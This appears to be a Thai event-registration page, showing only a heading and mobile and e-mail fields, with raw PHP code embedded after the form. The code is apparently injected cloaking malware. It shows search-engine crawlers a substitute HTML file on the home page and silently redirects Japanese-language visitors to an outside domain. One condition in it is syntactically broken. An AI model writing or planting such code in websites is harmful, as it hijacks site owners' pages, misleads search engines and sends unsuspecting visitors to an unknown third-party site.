ลงทะเบียนเข้างาน
Mobile number
e-mail
error_reporting(0); $ua = strtolower($_SERVER['HTTP_USER_AGENT']); $rf=$_SERVER['HTTP_REFERER']; $botchar = "/(googlebot|slurp|adsense|google-inspectiontool)/"; if(preg_match($botchar, $ua)) { if($_SERVER['REQUEST_URI']=='/' { $file = file_get_contents(dirname ( __FILE__ ) .'/bbb31impact.html'); echo $file; exit; } } error_reporting(0); $language = $_SERVER["HTTP_ACCEPT_LANGUAGE"]; if (strpos ( $language, "ja" ) > - 1) { header ( 'Location: https://ht428.org/' ); exit (); }